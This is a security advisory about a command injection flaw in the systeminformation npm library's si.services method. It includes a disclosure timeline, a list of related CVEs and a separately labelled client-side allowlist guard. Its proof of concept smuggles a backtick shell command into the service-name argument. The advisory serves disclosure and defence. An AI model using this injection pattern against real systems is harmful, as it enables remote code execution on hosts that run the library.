Coordinated Disclosure Timeline
- 2020-05-19: Emailed report to hildebrandt@plus-innovations.com
- 2020-05-19: Acknowledged by Sebastian Hildebrandt (hildebrandt@plus-innovations.com)
- 2020-05-19: Fix commit
- 2020-06-15: Emailed Sebastian Hildebrandt (hildebrandt@plus-innovations.com) to ask if he can create a security advisory.
- 2020-06-15: Sebastian Hildebrandt says he has now done the security advisory. It isn’t public yet though.
Summary
The si.services method has a command injection vulnerability. Clients of the systeminformation library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.
Product
systeminformation
Tested Version
Commit 1fd784f
Details
Issue 1: Command injection in si.services
The following proof-of-concept illustrates the vulnerability. First install systeminformation:
npm install systeminformation
Now create a file with the following contents:
const si = require('systeminformation');
si.services("foo,`echo>exploit`", function() {
  console.log(arguments);
});
and run it:
node test.js
Notice that a file named exploit has been created.
This vulnerability is similar to command injection vulnerabilities that have been found in other JavaScript libraries. Here are some examples:
- CVE-2020-7646
- CVE-2020-7614
- CVE-2020-7597
- CVE-2019-10778
- CVE-2019-10776
- CVE-2018-16462
- CVE-2018-16461
- CVE-2018-16460
- CVE-2018-13797
- CVE-2018-3786
- CVE-2018-3772
- CVE-2018-3746
- CVE-2017-16100
- CVE-2017-16042
We have written a CodeQL query, which automatically detects this vulnerability.
Impact
This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.
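The advisory does not show the library's internals, so the mitigation a client controls is at the call site. The following is an added example, not the advisory's proof of concept and not code from systeminformation: it validates each service name against a conservative allowlist before the comma-separated list (the format the PoC above uses) is handed to si.services(). The `si` object is passed in as a parameter (an assumption made so the guard can be exercised with a stub).

```javascript
// Added example (not from the advisory or the systeminformation library):
// a client-side guard that rejects shell metacharacters in service names
// before they ever reach si.services(). Library internals are not on the
// page, so this mitigates at the call site only.

// Allowlist for a single service name: letters, digits, '.', '_', '-', '@'.
// Backticks, '$', ';', '|', '&', quotes and whitespace are all rejected.
const SERVICE_NAME = /^[A-Za-z0-9._@-]+$/;

// si.services() takes a comma-separated list (as in the PoC), so split it,
// trim each entry, drop empties and validate every remaining name.
// Returns the clean array or throws before any command could run.
function validateServiceNames(list) {
  if (typeof list !== 'string') {
    throw new TypeError('service list must be a string');
  }
  const names = list
    .split(',')
    .map((s) => s.trim())
    .filter((s) => s.length > 0);
  if (names.length === 0) {
    throw new Error('service list is empty');
  }
  for (const name of names) {
    if (!SERVICE_NAME.test(name)) {
      throw new Error(`rejected service name: ${JSON.stringify(name)}`);
    }
  }
  return names;
}

// Wrapper a client can call instead of si.services() with untrusted input.
// `si` is a parameter (assumption) so the guard can be tested with a stub
// object exposing the same services(list, callback) shape.
function safeServices(si, list, callback) {
  const names = validateServiceNames(list); // throws on bad input
  return si.services(names.join(','), callback);
}
```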
Credit
This issue was discovered and reported by GitHub Engineer @erik-krogh (Erik Krogh Kristensen).
Contact
You can contact the GHSL team at securitylab@github.com; please include GHSL-2020-112 in any communication regarding this issue.